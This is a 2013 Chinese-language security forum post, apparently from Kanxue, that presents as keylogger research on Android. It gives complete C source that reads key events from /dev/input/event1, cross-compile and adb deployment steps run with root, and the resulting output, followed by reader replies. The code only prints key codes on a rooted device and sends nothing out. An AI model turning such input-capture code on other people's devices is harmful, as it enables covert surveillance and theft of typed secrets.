[原创]Android -- 键盘记录研究及补充-Android安全-看雪-安全社区|安全招聘|kanxue.com

[原创]Android -- 键盘记录研究及补充

发表于: 2013-12-12 18:06 16567

[原创]Android -- 键盘记录研究及补充

psr

2013-12-12 18:06

16567

鉴于之前看见的hacknet大哥写的帖子，很多人说编译不了，没有源码什么的，
我做了如下整理，在我的MOTO机器上运行可以了。
附上代码和操作步骤！

标题: 【原创】Android操作系统安全研究系列——键盘记录
作者: hacknet
时间: 2011-07-04,11:15:52
链接: http://bbs.pediy.com/showthread.php?t=136517

首先你得先安装
arm-none-linux-gnueabi-gcc
这东西
我是在ubuntu下的，所以命令操作就如下

wget http://www.codesourcery.com/sgpp/lite/arm/portal/package4571/public/arm-none-linux-gnueabi/arm-2009q1-203-arm-none-linux-gnueabi-i686-pc-linux-gnu.tar.bz2

然后
拷贝

sudo cp arm-2009q1-203-arm-none-linux-gnueabi-i686-pc-linux-gnu.tar.bz2 /usr/local

解压

sudo tar -jxvf arm-2009q1-203-arm-none-linux-gnueabi-i686-pc-linux-gnu.tar.bz2

设置环境变量

export PATH=$PATH:/usr/local/arm-2009q1/bin/

此设置方法不是永久性的，永久性的你可以自己更改/etc/bash.bashrc文件

OK了，可以准备编译了。

代码如下：

#include <stdio.h>
#include <stddef.h>
#include <linux/input.h>
#include <fcntl.h>

static int event0_fd = -1;
struct input_event ev0[64];

static int handle_event0()
{

int button , i, rd;

button = 0;

rd = read(event0_fd, ev0, sizeof(struct input_event) * 64);

printf("handle_event0 rd = %d  \n",rd);


if ( rd < sizeof(struct input_event) )
{
   return 0;

}

   printf("handle_event0 read OK ...\n");

for (i = 0; i < rd / sizeof(struct input_event); i++)
{
      if (ev0[i].type == 1&&ev0[i].value == 1)
{
printf("Press Key: %3d\n", ev0[i].code);
            if (ev0[i].code == 158)
   {
   printf("Press Key code: 158 ...\n");
               return 0;
            }
      }

   }

   printf("Press Key: test ...\n");

   return 1;
  }

  int main(int argc, char* argv[])
{

   int done;

   done = 1;

   event0_fd = open("/dev/input/event1", O_RDWR);

   if ( event0_fd < 0 )
   {
   return -1;

   }

   printf("Listening...\n");

   while(done)
   {
      done = handle_event0();
   }

   return 0;
}

然后

arm-none-linux-gnueabi-gcc -static key.c -o key

然后把生成的Key 给他PUSH到你的安卓鸡鸡上。

我这边是放在我的安卓鸡鸡路径的/dev/xxtest/目录下面

然后，按照下图这样的操作就完成了。

第一次写啊，高手莫砸哈。。。谢谢！

鉴于最后一张图不咋清晰，我把操作步骤复制出来了。

D:\Program Files\Shuame>adb shell
shell@edison:/ $ cd /dev/xxtest
cd /dev/xxtest
shell@edison:/dev/xxtest $ ll
ll
-rw-rw-rw- shell shell    588392 2013-12-12 16:22 key
shell@edison:/dev/xxtest $

shell@edison:/dev/xxtest $

shell@edison:/dev/xxtest $ su
su
root@edison:/dev/xxtest #

root@edison:/dev/xxtest # ll
ll
-rw-rw-rw- shell shell    588392 2013-12-12 16:22 key
root@edison:/dev/xxtest #

root@edison:/dev/xxtest #

root@edison:/dev/xxtest # chmod 777 key
chmod 777 key
root@edison:/dev/xxtest #

root@edison:/dev/xxtest #

root@edison:/dev/xxtest # ll
ll
-rwxrwxrwx shell shell    588392 2013-12-12 16:22 key
root@edison:/dev/xxtest #

root@edison:/dev/xxtest #

root@edison:/dev/xxtest # ./key
./key
Listening...
handle_event0 rd = 32
handle_event0 read OK ...
Press Key: test ...
handle_event0 rd = 32
handle_event0 read OK ...
Press Key: test ...
handle_event0 rd = 48

补充下：

event0_fd = open("/dev/input/event1", O_RDWR);

这个代码有时候需要改，因为之前那位大哥写的是event0，可是我一直没显示输出。最后我进入我的手机安卓系统，用getevent命令查看，才发现我的是event1,所以就改了下。

就是如何查看event多少呢？

打开CMD
然后输入
adb shell

然后
su

然后
getevent

就可以看见是event几了。。。

好叻。收尾。。。

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

2.jpg （29.81kb，4次下载）
3.jpg （9.85kb，1次下载）
5.jpg （52.35kb，88次下载）

收藏・18

免费・5

支持

最新回复 (9)
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 141 关注私信	熊猫正正 9 2 楼嘿嘿~~ 2013-12-12 20:35 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 3 楼嘿嘿嘿嘿嘿嘿 2013-12-12 20:54 0
unwww 雪币： 32 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 74 粉丝 0 关注私信	unwww 4 楼读取到的是整个屏幕的触屏信息吧？ 2013-12-18 11:39 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 5 楼是的，不过只有在输入的时候才有，没输入点屏幕没输出的 2013-12-19 10:52 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 6 楼求加精啊。。。 2013-12-19 14:38 0
ysclwjxv 雪币： 7 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	ysclwjxv 7 楼俄罗斯有款很牛的。 2013-12-24 21:27 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 8 楼哪个？求推荐 2014-1-15 14:37 0
人很老实雪币： 362 活跃值： (25) 能力值： ( LV7，RANK：100 ) 在线值：发帖 6 回帖 83 粉丝 1 关注私信	人很老实 2 9 楼为什么不直接:adb shell getevent /dev/input/event1呢? 2014-2-24 14:28 0
shangrila 雪币： 1585 活跃值： (182) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 210 粉丝 0 关注私信	shangrila 10 楼很好,支持 2014-3-6 14:42 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

psr

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (9)
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 141 关注私信	熊猫正正 9 2 楼嘿嘿~~ 2013-12-12 20:35 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 3 楼嘿嘿嘿嘿嘿嘿 2013-12-12 20:54 0
unwww 雪币： 32 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 28 回帖 74 粉丝 0 关注私信	unwww 4 楼读取到的是整个屏幕的触屏信息吧？ 2013-12-18 11:39 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 5 楼是的，不过只有在输入的时候才有，没输入点屏幕没输出的 2013-12-19 10:52 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 6 楼求加精啊。。。 2013-12-19 14:38 0
ysclwjxv 雪币： 7 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	ysclwjxv 7 楼俄罗斯有款很牛的。 2013-12-24 21:27 0
psr 雪币： 33 活跃值： (58) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 24 粉丝 0 关注私信	psr 8 楼哪个？求推荐 2014-1-15 14:37 0
人很老实雪币： 362 活跃值： (25) 能力值： ( LV7，RANK：100 ) 在线值：发帖 6 回帖 83 粉丝 1 关注私信	人很老实 2 9 楼为什么不直接:adb shell getevent /dev/input/event1呢? 2014-2-24 14:28 0
shangrila 雪币： 1585 活跃值： (182) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 210 粉丝 0 关注私信	shangrila 10 楼很好,支持 2014-3-6 14:42 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]Android -- 键盘记录 研究及补充

[原创]Android -- 键盘记录研究及补充